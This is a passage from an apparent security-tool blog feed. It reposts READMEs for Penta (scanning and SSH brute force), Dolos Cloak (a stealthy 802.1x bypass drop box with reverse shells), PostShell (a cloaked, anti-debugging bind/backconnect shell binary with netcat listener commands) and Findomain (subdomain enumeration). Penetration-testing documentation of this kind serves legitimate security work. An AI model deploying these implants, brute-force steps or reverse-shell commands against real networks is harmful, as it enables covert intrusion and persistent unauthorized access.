<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO81qxE_2wFs5bR6Vbh3pG0QOo0_1bcUQJ9B7W4tNZFQsoGo7hpFuAiu9Q0PbpJzKccM_FejWeqBmVKP0fb78oZMIOu4Foi3r36fXA1aSmLM_qPRqbgzOkt3cYp2M6VAnsLK9lBXK8VgrJ/s1600/Penta.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="428" data-original-width="702" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO81qxE_2wFs5bR6Vbh3pG0QOo0_1bcUQJ9B7W4tNZFQsoGo7hpFuAiu9Q0PbpJzKccM_FejWeqBmVKP0fb78oZMIOu4Foi3r36fXA1aSmLM_qPRqbgzOkt3cYp2M6VAnsLK9lBXK8VgrJ/s1600/Penta.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;"><br /></span></h2>
<h2 style="text-align: left;">
<span style="color: #073763;">Penta (PENTest + Automation tool) is Pentest automation tool using Python3.</span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<b>Install requirements</b><br />
penta requires the following packages.<br />
<ul style="text-align: left;">
<li>Python3.7</li>
<li>pipenv</li>
</ul>
<br />
Resolve python package dependency.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pipenv install</span><br />
<br />
If you dislike pipenv..<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pip install -r requirements.txt</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pipenv run start <options></span><br />
<br />
If you dislike pipenv...<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ python penta/penta.py</span><br />
<br />
<b>Usage: List options</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pipenv run start -h</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]</span><br />
<br />
Penta is Pentest automation tool.<br />
<br />
<b>optional arguments:</b><br />
<ul style="text-align: left;">
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -h, --help show this help message and exit</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -target TARGET Specify target IP / domain</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -ports PORTS Please, specify the target port(s) separated by comma.</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Default: 21,22,25,80,110,443,8080</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -proxy PROXY Proxy[IP:PORT]</span></li>
</ul>
<br />
<b>Usage: Main menu</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[ ] === MENU LIST =================================</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[0] EXIT</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[1] Port scanning Default: 21,22,25,80,110,443,8080</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[2] Nmap & vuln scanning</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[3] Check HTTP option methods</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[4] Grab DNS server info</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[5] Shodan host search</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[6] FTP connect with anonymous</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[7] SSH connect with Brute Force</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[99] Change target host</span><br />
<br />
<b>1. Port scanning</b><br />
To check ports for a target. Log output supported.<br />
<br />
<b>2. Nmap</b><br />
To check ports by additional means using nmap<br />
<br />
<b>3. Check HTTP option methods</b><br />
To check the methods (e.g. GET,POST) for a target.<br />
<br />
<b>4. Grab DNS server info</b><br />
To show the info about DNS server.<br />
<br />
Shodan host search To collect host service info from Shodan.<br />
Request <a href="https://developer.shodan.io/" target="_blank">Shodan API key</a> to enable the feature.<br />
<br />
FTP connect with anonymous To check if it has anonymous access activated in port 21. FTP users can authenticate themselves using the plain text sign-in protocol (Typically username and password format), but they can connect anonymously if the server is configured to allow it.<br />
<br />
Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.<br />
<br />
SSH connect with Brute Force To check ssh connection to scan with Brute Force. Dictionary data is in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">data/dict</span>.<br />
<br />
<span style="font-size: large;"><a href="https://github.com/takuzoo3868/penta" target="_blank">Download Now</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-45130106193595480012019-09-23T13:24:00.002+05:302019-09-23T13:26:31.502+05:30Dolos Cloak- For Network Penetration Testers To Automated 802.1x Bypass<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9EP5Uq3H4k6qtHCngV7UHk7IvyPzqaNQTzCtZavULEKW53rCsWKRSXJYQi84feoIBfHOCJAzG3uXf86hTDp_pLEId0cN3-VSWUjp2YGGS5492E_gf3L3yAUTSxOFNbabNW5F0PjrgapOf/s1600/Dolos+Cloak.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="661" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9EP5Uq3H4k6qtHCngV7UHk7IvyPzqaNQTzCtZavULEKW53rCsWKRSXJYQi84feoIBfHOCJAzG3uXf86hTDp_pLEId0cN3-VSWUjp2YGGS5492E_gf3L3yAUTSxOFNbabNW5F0PjrgapOf/s1600/Dolos+Cloak.png" /></a></div>
<h3 style="text-align: left;">
<span style="color: #073763;"><br /></span></h3>
<h2 style="text-align: left;">
<span style="color: #073763;">Dolos Cloak- Automated 802.1x Bypass</span></h2>
<br />
Dolos Cloak is a python script designed to help network penetration testers and red teamers bypass 802.1x solutions by using an advanced man-in-the-middle attack.<br />
<br />
The script is able to piggyback on the wired connection of a victim device that is already allowed on the target network without kicking the victim device off the network. It was designed to run on an Odroid C2 running Kali ARM and requires two external USB ethernet dongles. It should be possible to run the script on other hardware and distros but it has only been tested on an Odroid C2 thus far.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">How it Works</span></h3>
Dolos Cloak uses iptables, arptables, and ebtables NAT rules in order to spoof the MAC and IP addresses of a trusted network device and blend in with regular network traffic. On boot, the script disallows any outbound network traffic from leaving the Odroid in order to hide the MAC addresses of its network interfaces.<br />
<br />
Next, the script creates a bridge interface and adds the two external USB ethernet dongles to the bridge. All traffic, including any 802.1x authentication steps, is passed on the bridge between these two interfaces.<br />
<br />
In this state, the device is acting like a wire tap. Once the Odroid is plugged in between a trusted device (desktop, IP phone, printer, etc.) and the network, the script listens to the packets on the bridge interface in order to determine the MAC address and IP of the victim device.<br />
<br />
Once the script determines the MAC address and IP of the victim device, it configures NAT rules in order to make all traffic on the OUTPUT and POSTROUTING chains look like it is coming from the victim device. At this point, the device is able to communicate with the network without being burned.<br />
<br />
Once the Odroid is spoofing the MAC address and IP of the victim device, the script sends out a DHCP request in order to determine its default gateway, search domain, and name servers. It uses the response in order to configure its network settings so that the device can communicate with the rest of the network.<br />
<br />
At this point, the Odroid is acting as a stealthy foothold on the network. Operators can connect to the Odroid over the built-in NIC eth0 in order to obtain network access. The device can also be configured to send out a reverse shell so that operators can utilize the device as a drop box and run commands on the network remotely.<br />
<br />
For example, the script can be configured to run an Empire python stager after running the man-in-the-middle attack. You can then use the Empire C2 connection to upgrade to a TCP reverse shell or VPN tunnel.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation and Usage</span></h3>
<ul style="text-align: left;">
<li>Perform default install of Kali ARM on Odroid C2. </li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">ssh root@169.254.44.44</span><br />
<ul style="text-align: left;">
<li>Be sure to save this project to /root/tools/dolos_cloak</li>
<li>Plug one external USB NIC into the Odroid and run dhclient to get internet access in order to install dependencies:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">dhclient usbnet0</span><br />
<ul style="text-align: left;">
<li>Run the install script to get all the dependencies and set the Odroid to perform the MitM on boot by default. Keep in mind that this will make drastic changes to the device's network settings and disable Network Manager. You may want to download any additional tools before this step:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd setup</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./setup.sh</span><br />
<ul style="text-align: left;">
<li>You may want to install some other tools like 'host' that do not come standard on Kali ARM. Empire, enum4linux, and responder are also nice additions.</li>
<li>Make sure you are able to ssh into the Odroid via the built-in NIC eth0. Add your public key to /root/.ssh/authorized_keys for fast access.</li>
<li>Modify config.yaml to meet your needs. You should make sure the interfaces match the default names that your Odroid is giving your USB dongles. Order does not matter here. You should leave client_ip, client_mac, gateway_ip, and gateway_mac blank unless you used a LAN tap to mine them. The script should be able to figure this out for us. Set these options only if you know for sure their values. The management_int, domain_name, and dns_server options are placeholders for now but will be usefull very soon. For shells, you can set up a custom autorun command in the config.yaml to run when the man-in-middle attack has autoconfigured. You can also set up a cron job to send back shells.</li>
<li>Connect two usb ethernet dongles and reboot the device (you need two because the built-in ethernet won't support promiscuous mode)</li>
<li>Boot the device and wait a few seconds for autosniff.py to block the OUTPUT ethernet and IP chains. Then plug in the Odroid between a trusted device and the network.</li>
<li>PWN N00BZ, get $$$, have fun, hack the planet</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Tips</span></h3>
<ul style="text-align: left;">
<li>Mod and run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./scripts/upgrade_to_vpn.sh</span> to turn a stealthy Empire agent into a full blown VPN tunnel</li>
<li>Mod and run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./scripts/reverse_listener_setup.sh</span> to set up a port for a reverse listener on the device.</li>
<li>Run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./scripts/responder_setup.sh</span> to allow control of the protocols that we capture for responder. You shoud run responder on the bridge interface:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">responder -I mibr</span><br />
<ul style="text-align: left;">
<li>Be careful as some NAC solutions use port 445, 443, and 80 to periodically verify hosts. Working on a solution to this.</li>
<li>Logs help when the autosniff.py misbehaves. The rc.local is set to store the current session logs in ./logs/session.log and logs in .<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/logs/history.log</span> so we can reboot and still check the last session's log if need be. Log files have cool stuff in them like network info, error messages, and all bash commands to set up the NAT ninja magic.</li>
</ul>
<br />
<span style="font-size: large;"><a href="https://github.com/fkasler/dolos_cloak" target="_blank">Download Dolos Cloak</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-91567593165933732022019-09-10T12:01:00.000+05:302019-09-10T12:04:52.103+05:30PostShell - Post Exploitation Bind/Backconnect Shell<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinB94D7q_Ld-Yl2oKLBcH6cJNeAT9LvEPAvYkpb7eYP7jan0by9SzjW5mZCQcE2lBP616Vcf_sNPwk9dJTII4XcydjBL-Jn03FnI23mjIKbISoELqMCSNqesec7yBljjr9YsJpCY7yrZiG/s1600/PostShell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="873" height="379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinB94D7q_Ld-Yl2oKLBcH6cJNeAT9LvEPAvYkpb7eYP7jan0by9SzjW5mZCQcE2lBP616Vcf_sNPwk9dJTII4XcydjBL-Jn03FnI23mjIKbISoELqMCSNqesec7yBljjr9YsJpCY7yrZiG/s640/PostShell.png" width="640" /></a></div>
<h3 style="text-align: left;">
<span style="color: #073763;"><br /></span></h3>
<h3 style="text-align: left;">
<span style="color: #073763;">PostShell - Post Exploitation Bind/Backconnect Shell</span></h3>
<br />
PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control.<br />
<br />
The stub size is around 14kb and can be compiled on any Unix like system. Banner and interaction with shell after a connection is started.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Why not use a traditional Backconnect/Bind Shell?</span></h3>
PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.<br />
<br />
It also incorporates both a back connect and bind shell, meaning that if a target doesn't allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.<br />
<br />
PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features</span></h3>
<ul style="text-align: left;">
<li>Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.</li>
<li>Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.</li>
<li>TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.</li>
<li>Bind/Backconnect shell, both a bind shell and back connect can be created.</li>
<li>Small Stub Size, a very small stub(<14kb) is usually generated.</li>
<li>Automatically Daemonizes</li>
<li>Tries to set GUID/UID to 0 (root)</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Getting Started</span></h3>
<ol style="text-align: left;">
<li>Downloading: <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://github.com/rek7/postshell</span></li>
<li>Compiling: <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd postshell && sh compile.sh </span>This should create a binary called "stub" this is the malware.</li>
</ol>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Commands</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ ./stub</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Bind Shell Usage: ./stub port</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Back Connect Usage: ./stub ip port</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Example Usage</span></h3>
<b>Backconnect:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ ./stub 127.0.0.1 13377</span><br />
<br />
<b>Bind Shell:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ ./stub 13377</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Receiving a Connection with Netcat</span></h3>
<br />
<b>Recieving a backconnect:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ nc -vlp port</span><br />
<br />
<b>Connecting to a bind Shell:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ nc host port</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">TODO:</span></h3>
Add domain resolution<br />
<br />
<span style="font-size: large;"><a href="https://github.com/rek7/postshell" target="_blank">Download PostShell</a></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<i><span style="font-family: Courier New, Courier, monospace;"><b>Disclaimer: </b>These scripts for knowledge purpose only</span></i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-10812798351712216422019-08-24T14:26:00.001+05:302020-06-20T03:43:39.976+05:30Findomain- Fastest And Cross-platform Subdomain Enumerator<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSbZkjOAxv9oxToj0Y36V1K0WPLBPWUmLfXo3WHzU4u8g9oMVVDnWNwglvq5Wh_sQCqIH6CMh2_Q77GA7WEhZECJvDcPvuYfLIFLV3QhxPZZ35F7QeTmTYvxafsa0WfhY0R68yq_fKu6OX/s1600/Findomain.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="412" data-original-width="646" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSbZkjOAxv9oxToj0Y36V1K0WPLBPWUmLfXo3WHzU4u8g9oMVVDnWNwglvq5Wh_sQCqIH6CMh2_Q77GA7WEhZECJvDcPvuYfLIFLV3QhxPZZ35F7QeTmTYvxafsa0WfhY0R68yq_fKu6OX/s1600/Findomain.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">FinDomain- Fastest And Cross-platform Subdomain Enumerator.</span></h2>
<br />
<b>Comparison</b><br />
It comparison gives you a idea why you should use findomain instead of another enumerators. The domain used for the test was Microsoft.com in the following BlackArch virtual machine:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><b>Host:</b> KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><b>Kernel:</b> 5.2.6-arch1-1-ARCH</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><b>CPU:</b> Intel (Skylake, IBRS) (4) @ 2.904GHz</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><b>Memory:</b> 139MiB / 3943MiB</span><br />
<br />
Find-Domain used to calculate the time, is the time command in Linux.<br />
<br />
<b><span style="color: #073763;">You can see all the details of the tests in it link.</span></b><br />
<br />
<style type="text/css"><!--td {border: 1px solid #ccc;}br {mso-data-placement:same-cell;}--></style><br />
<table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="border-collapse: collapse; border: none; font-family: arial; font-size: 10pt; table-layout: fixed; width: 0px;" xmlns="http://www.w3.org/1999/xhtml"><colgroup><col width="119"></col><col width="105"></col><col width="168"></col><col width="100"></col><col width="100"></col></colgroup><tbody>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Enumeration Tool"}" style="border-color: rgb(0, 0, 0); font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Enumeration Tool</td><td data-sheets-value="{"1":2,"2":"Search Time"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); border-top-color: rgb(0, 0, 0); font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Search Time</td><td data-sheets-value="{"1":2,"2":"Total Subdomains Found"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); border-top-color: rgb(0, 0, 0); font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Total Subdomains Found</td><td data-sheets-value="{"1":2,"2":"CPU Usage"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); border-top-color: rgb(0, 0, 0); font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">CPU Usage</td><td data-sheets-value="{"1":2,"2":"RAM Usage"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); border-top-color: rgb(0, 0, 0); font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">RAM Usage</td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Findomain"}" style="border-bottom-color: rgb(0, 0, 0); border-left-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Findomain</td><td data-sheets-value="{"1":2,"2":"real 0m38.701s"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">real 0m38.701s</td><td data-sheets-value="{"1":3,"3":5622}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">5622</td><td data-sheets-value="{"1":2,"2":"Very Low"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Very Low</td><td data-sheets-value="{"1":2,"2":"Very Low"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Very Low</td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"assetfinder"}" style="border-bottom-color: rgb(0, 0, 0); border-left-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">assetfinder</td><td data-sheets-value="{"1":2,"2":"real 6m1.117s"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">real 6m1.117s</td><td data-sheets-value="{"1":3,"3":4630}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">4630</td><td data-sheets-value="{"1":2,"2":"Very Low"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Very Low</td><td data-sheets-value="{"1":2,"2":"Very Low"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Very Low</td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Subl1st3r"}" style="border-bottom-color: rgb(0, 0, 0); border-left-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Subl1st3r</td><td data-sheets-value="{"1":2,"2":"real 7m14.996s"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">real 7m14.996s</td><td data-sheets-value="{"1":3,"3":996}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">996</td><td data-sheets-value="{"1":2,"2":"Low"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Low</td><td data-sheets-value="{"1":2,"2":"Low"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Low</td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Amass*"}" style="border-bottom-color: rgb(0, 0, 0); border-left-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Amass*</td><td data-sheets-value="{"1":2,"2":"real 29m20.301s"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">real 29m20.301s</td><td data-sheets-value="{"1":3,"3":332}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">332</td><td data-sheets-value="{"1":2,"2":"Very High"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Very High</td><td data-sheets-value="{"1":2,"2":"Very High"}" style="border-bottom-color: rgb(0, 0, 0); border-right-color: rgb(0, 0, 0); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Very High</td></tr>
</tbody></table>
<br />
I can't wait to the amass test for finish, looks like it will never ends and additionally the resources usage is very high.<br />
<br />
<b>Note: </b>The benchmark was made the 10/08/2019, since it point other software's can improve things and you will got different results.<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features</span></h3>
<ul style="text-align: left;">
<li>Discover sub-domains without brute-force, it uses Certificate Transparency Logs.</li>
<li>Discover sub-domains with or without IP address according to user arguments.</li>
<li>Read target from user argument (-t).</li>
<li>Read a list of targets from file and discover their sub-domains with or without IP and also write to output files per-domain if specified by the user, recursively.</li>
<li>Write output to TXT file.</li>
<li>Write output to CSV file.</li>
<li>Write output to JSON file.</li>
<li>Cross platform support: Any platform.</li>
<li>Optional multiple API support.</li>
<li>Proxy support.</li>
</ul>
<br />
<b>Note: </b>the proxy support is just to proxify APIs requests, the actual implementation to discover IP address of sub-domains doesn't support proxyfing and it's made using the host network still if you use the -p option.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">How it works?</span></h3>
It tool doesn't use the common methods for sub(domains) discover, the tool uses Certificate Transparency logs to find sub-domains and it method make it tool the most faster and reliable. The tool make use of multiple public available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/<br />
<br />
<b><span style="color: #073763;">APIs that are using at the moment:</span></b><br />
<ul style="text-align: left;">
<li>Certspotter: https://api.certspotter.com/</li>
<li>Crt.sh : https://crt.sh</li>
<li>Virustotal: https://www.virustotal.com/ui/domains/</li>
<li>Sublit3r: https://api.sublist3r.com/</li>
<li>Facebook: https://developers.facebook.com/docs/certificate-transparency</li>
</ul>
<br />
If you know other that should be added, open an issue.<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Supported platforms in our binary releases</span></h3>
All supported platforms in the binarys that we give are 64 bits only and we don't have plans to add support for 32 bits binary releases, if you want to have support for 32 bits follow the documentation.<br />
<ul style="text-align: left;">
<li>Linux</li>
<li>Windows</li>
<li>MacOS</li>
<li>ARM</li>
<li>Arch64 (Raspberry Pi)</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Build for 32 bits or another platform</span></h3>
If you want to build the tool for your 32 bits system or another platform, follow it steps:<br />
<br />
Note: You need to have <a href="https://rust-lang.org/" target="_blank">rust</a>, <a href="http://www.gnu.org/software/make" target="_blank">make</a> and <a href="https://www.perl.org/" target="_blank">perl</a> installed in your system first.<ol style="text-align: left;">
</ol>
<br />
<b>Using the Github source code:</b><br />
<ul style="text-align: left;">
<li>Clone the repository or download the release source code.</li>
<li>Extract the release source code (only needed if you downloaded the compressed file).</li>
<li>Go to the folder where the source code is.</li>
<li>Execute cargo build --release</li>
<li>Now your binary is in target/release/findomain and you can use it.</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Installation Android (Termux)</span></h3>
Install the Termux package, open it and follow it commands:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ pkg install rust make perl</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ cargo install findomain</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ cd $HOME/.cargo/bin</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ ./findomain</span><br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation in Linux using source code</span></h3>
If you want to install it, you can do that manually compiling the source or using the precompiled binary.<br />
<br />
Manually: You need to have rust, make and perl installed in your system first.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ git clone https://github.com/Edu4rdSHL/findomain.git</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ cd findomain</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ cargo build --release</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ sudo cp target/release/findomain /usr/bin/</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ findomain</span><br />
<br />
<h3 style="text-align: left;">
<b><span style="color: #073763;">Installation in Linux using compiled artifacts</span></b></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux</span><br />
